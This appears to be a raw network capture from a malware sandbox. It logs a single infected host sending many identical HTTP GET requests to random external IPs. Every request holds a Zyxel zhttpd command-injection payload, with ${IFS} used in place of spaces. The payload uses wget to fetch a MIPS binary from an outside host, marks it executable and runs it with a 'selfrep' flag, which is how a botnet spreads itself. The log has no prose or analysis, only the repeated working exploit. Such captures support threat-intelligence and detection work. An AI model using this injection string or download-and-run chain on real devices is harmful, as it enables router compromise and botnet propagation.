                                      Jan 19, 2024 17:29:28.693710089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3470192.168.2.145695467.64.238.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693747997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3471192.168.2.1448980193.141.26.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693785906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3472192.168.2.144699667.46.189.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693809986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3473192.168.2.143524479.58.2.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693871975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3474192.168.2.1435362183.38.118.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693897009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3475192.168.2.1435792176.64.175.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693941116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3476192.168.2.1453818202.32.153.74443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693953991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3477192.168.2.145311885.162.185.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.693995953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3478192.168.2.145011668.76.156.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694031954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3479192.168.2.1439752211.13.87.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694076061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3480192.168.2.144045064.37.226.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694120884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3481192.168.2.1451506122.149.75.213443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694155931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3482192.168.2.144523644.71.103.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694199085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3483192.168.2.144409477.36.37.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694237947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3484192.168.2.143417092.184.102.133443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694257975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3485192.168.2.1452518105.242.171.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.694291115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3486192.168.2.1438462149.235.205.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:28.701029062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3487192.168.2.1457252196.222.11.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704166889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3488192.168.2.144803097.206.28.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704232931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3489192.168.2.143390037.203.37.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704396963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3490192.168.2.1438994201.210.39.117443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704425097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3491192.168.2.145096452.102.131.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704459906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3492192.168.2.143500257.84.77.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704509974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3493192.168.2.144973061.157.113.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704540968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3494192.168.2.14512324.160.133.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704576015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3495192.168.2.1447088103.243.95.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704605103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3496192.168.2.1459682107.55.97.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704631090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3497192.168.2.1435794166.32.135.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704672098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3498192.168.2.1450448109.75.73.214443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704700947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3499192.168.2.144905478.28.100.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704771042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3500192.168.2.144947051.243.119.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704797029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3501192.168.2.1451522146.75.10.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704828978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3502192.168.2.143518223.64.161.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704869986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3503192.168.2.1453358219.109.166.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704929113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3504192.168.2.144731614.207.106.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704960108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3505192.168.2.1443828158.56.154.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.704982042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3506192.168.2.1438062150.108.183.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705024958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3507192.168.2.143367877.151.171.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705065012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3508192.168.2.1459738212.210.130.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705094099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3509192.168.2.1460782186.116.44.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705127001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3510192.168.2.146074065.186.138.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705194950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3511192.168.2.145879244.73.44.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705230951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3512192.168.2.143670867.85.234.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705285072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3513192.168.2.1456354167.234.96.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705318928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3514192.168.2.1457470147.214.188.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705358028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3515192.168.2.1453040219.75.27.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705387115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3516192.168.2.1443612184.24.199.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705425024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3517192.168.2.145098458.165.241.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705440044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3518192.168.2.1441566200.88.113.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705511093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3519192.168.2.1445848134.245.140.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705533028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3520192.168.2.1455572120.212.65.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705560923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3521192.168.2.145340434.38.71.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705604076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3522192.168.2.143321261.238.175.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705625057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3523192.168.2.1457550162.212.158.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705673933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3524192.168.2.1449810102.138.130.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705718994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3525192.168.2.1457144171.16.137.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705776930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3526192.168.2.1459660138.84.130.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705806017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3527192.168.2.1438592124.159.65.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705842972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3528192.168.2.1445648194.108.11.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705878019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3529192.168.2.144513250.229.103.77443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705902100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3530192.168.2.1454502178.153.228.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705940962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3531192.168.2.1454914108.41.101.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.705993891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3532192.168.2.1445798205.36.78.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:29.706021070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3533192.168.2.1451844122.177.231.115443
                                      TimestampBytes transferredDirectionData
